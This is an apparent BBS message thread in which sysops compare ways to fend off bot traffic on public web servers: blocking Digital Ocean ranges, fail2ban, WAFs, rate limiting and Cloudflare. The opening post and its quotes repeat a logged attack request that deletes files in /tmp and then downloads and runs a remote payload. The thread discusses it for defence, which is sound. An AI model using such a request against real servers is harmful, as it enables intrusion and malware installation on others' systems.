Hi All,

I have a web server accessible to the public, which as expected was getting hammered with various bots & script kiddies.

I've setup an IP blocklist for the usual suspects, but I was noticing a lot of malicious traffic from California, Germany, The Netherlands & the UK as well.

Not wanting to block those countries out entirely I decided to dig a little deeper and noticed that many of these addresses had one thing in common: They're coming from Digital Ocean.

Most of these seem to be trying to log into wordpress or bring up other login pages for other services that don't exist on this web server. Others seem to be a little more insidious:

"GET /shell?cd+/tmp;rm+-rf+*;wget+31.210.xx.xxx/jaws;sh+/tmp/jaws HTTP/1.1"

None of these work or do anything on my webserver, but I still don't want them hammering on my system.

Fortunately Digital Ocean publishes a full list of the IP addresses they use: https://digitalocean.com/geo/google.csv

After adding these ranges to my blocklist suddenly my apache logs are a lot quieter.

Do you filter by country/region or by provider? If so, which IP ranges do
you block?

p.s: I know some BBS hubs are located on VPS providers, you may need to modify these lists if you want to use them so you can still communicate with your hub if they happen to use Digital Ocean. ML looks like he uses OVH so he's safe... ;)


Jay

... The manner in which it is given is worth more than the gift.

--- Mystic BBS v1.12 A48 2022/03/11 (Raspberry Pi/32)
* Origin: Northern Realms (1337:3/126)

Not wanting to block those countries out entirely I decided to dig a littl deeper and noticed that many of these addresses had one thing in common: They're coming from Digital Ocean.

Most of these seem to be trying to log into wordpress or bring up other lo pages for other services that don't exist on this web server. Others seem be a little more insidious:

"GET /shell?cd+/tmp;rm+-rf+*;wget+31.210.xx.xxx/jaws;sh+/tmp/jaws HTTP/1.1

None of these work or do anything on my webserver, but I still don't want hammering on my system.
Fortunately Digital Ocean publishes a full list of the IP addresses they u https://digitalocean.com/geo/google.csv

After adding these ranges to my blocklist suddenly my apache logs are a lo quieter.

Do you filter by country/region or by provider? If so, which IP ranges do you block?

Nice - thanks for the list Warp!

Tbh I don't block HTTP access at all really, because it's inevitable that the bots will move from place to place eventually and it's just a constant game
of whack-a-mole. Rather, I use Web Application Firewalls for webservers and things like fail2ban or sshguard for SSH which automatically blacklists/greylists abusers.

Chur,
Al


hyjinx // Alistair Ross
Author of 'Back to the BBS' Documentary: https://bit.ly/3tRINeL (YouTube) alsgeeklab.com

--- Mystic BBS v1.12 A46 2020/08/26 (Linux/64)
* Origin: bbs.alsgeeklab.com:2323 (1337:2/104)

On 18 Mar 2022, Warpslide said the following...

Hi All,

I have a web server accessible to the public, which as expected was getting hammered with various bots & script kiddies.

I've setup an IP blocklist for the usual suspects, but I was noticing a lot of malicious traffic from California, Germany, The Netherlands & the UK as well.

Not wanting to block those countries out entirely I decided to dig a little deeper and noticed that many of these addresses had one thing in common: They're coming from Digital Ocean.

Most of these seem to be trying to log into wordpress or bring up other login pages for other services that don't exist on this web server. Others seem to be a little more insidious:

"GET /shell?cd+/tmp;rm+-rf+*;wget+31.210.xx.xxx/jaws;sh+/tmp/jaws HTTP/1.1"

None of these work or do anything on my webserver, but I still don't
want them hammering on my system.

Fortunately Digital Ocean publishes a full list of the IP addresses they use: https://digitalocean.com/geo/google.csv

After adding these ranges to my blocklist suddenly my apache logs are a lot quieter.

Do you filter by country/region or by provider? If so, which IP ranges
do you block?

p.s: I know some BBS hubs are located on VPS providers, you may need to modify these lists if you want to use them so you can still communicate with your hub if they happen to use Digital Ocean. ML looks like he
uses OVH so he's safe... ;)

Good info, I use OVH yes for the UK and CA hubs. I made a publicly available blacklist of IP's for mystic bbses along with a sort of door/script thing to automagically grab, compare and add new IP's to your local list (mystic only so far).

The main blacklist can be found here;
$ curl https://erb.pw/blacklist

If you want to use my door/script, you can get it here; https://github.com/christiansacks/mystic-twitupd

Hope this helps out people =)

---
|14Best regards,
|11Ch|03rist|11ia|15n |11a|03ka |11Me|03aTLoT|11io|15N

|07── |08[|10eml|08] |15ml@erb.pw |07── |08[|10web|08] |15www.erb.pw |07───┐ |07── |08[|09fsx|08] |1521:1/158 |07── |08[|11tqw|08] |151337:1/101 |07┬──┘ |07── |08[|12rtn|08] |1580:774/81 |07─┬ |08[|14fdn|08] |152:250/5 |07───┘
|07── |08[|10ark|08] |1510:104/2 |07─┘

... Reward for a job well done: More work

--- Mystic BBS v1.12 A47 2021/12/13 (Linux/64)
* Origin: thE qUAntUm wOrmhOlE, rAmsgAtE, uK. bbs.erb.pw (1337:1/101)

Re: IP Block Lists
By: Warpslide to All on Fri Mar 18 2022 10:22 pm

Howdy,

I have a web server accessible to the public, which as expected was getting hammered with various bots & script kiddies.

I've setup an IP blocklist for the usual suspects, but I was noticing a lot of malicious traffic from California, Germany, The
Netherlands & the UK as well.

Not wanting to block those countries out entirely I decided to dig a little deeper and noticed that many of these addresses had one
thing in common: They're coming from Digital Ocean.

Yeah, I've always thought that "country" blocking would never last (just like "unknown caller blocking on your phone", or even now answering calls with a caller id) - spammers get around it as quickly as we decide to implement it. For the same resason, blocking "Digital Ocean" wont last - they'll find another low cost VPS platform to invest in.

One thing that I do (with web anyway), is to block "ip address" connections - so http://1.2.3.4 (if 1.2.3.4 was my ip address) would return 444. You have to use my proper domain name to get the web server to respond to it.

While this has been working well, it obviously doesnt stop spammers trying - but they do need to have a current url list (instead of programming their bots to try all IP addresses).

If I need to, my next step (and I've been thinking about it) would be to see if haproxy can help. With it, you can limit concurrent connections from the same source (which in theory would reduce denial impacts). You could also probably use haproxy to redirect "unwanted addresses" to a honeypot and let them waste their time there.

Ultimately, you cannt stop it - nor would you want to, as it would be hard to determine who is real or not - and probably the only affective way would be some sort of "entry captcha".


...δεσ∩
--- SBBSecho 3.15-Linux
* Origin: I'm playing with ANSI+videotex - wanna play too? (1337:2/101)

Hello Warpslide!

Replying to a msg dated 18 Mar 22 22:22, from you to all.

I host my DNS nameservers with Cloudflare, as a result a lot of the nasties are stopped without me even having to worry about them.
A decent rate limiting setup on my webservers saves the rest.

Satchmo


... This tagline prohibited by Orville Bullitt
--- GoldED+/LNX 1.1.5--b20170303
* Origin: Sonic BBS :: North Yorkshire, England (1337:1/107)

Am 18.03.22 schrieb Warpslide@1337:3/126 in TQW_GEN:

Hallo Warpslide,

Do you filter by country/region or by provider? If so, which IP
ranges do you block?

At the moment, I don't use fixed block lists at all, neither on my BBS
nor on my VPSes.
But I'm running fail2ban on these systems, configured eg. for Postfix.
SSH and some Apache 'targets'. On my BBS, I tried to add some
configuration for Synchronet, next to its own blocking mechanisms.

But as all this keeps being a moving target, I try do adapt as well :)

Regards,
Anna
PS. at the moment, the web server of my BBS is only reachable via
IPv6; telnet and binkp do work via v4 & v6.

--- OpenXP 5.0.51
* Origin: Imzadi Box Point (1337:1/108.1)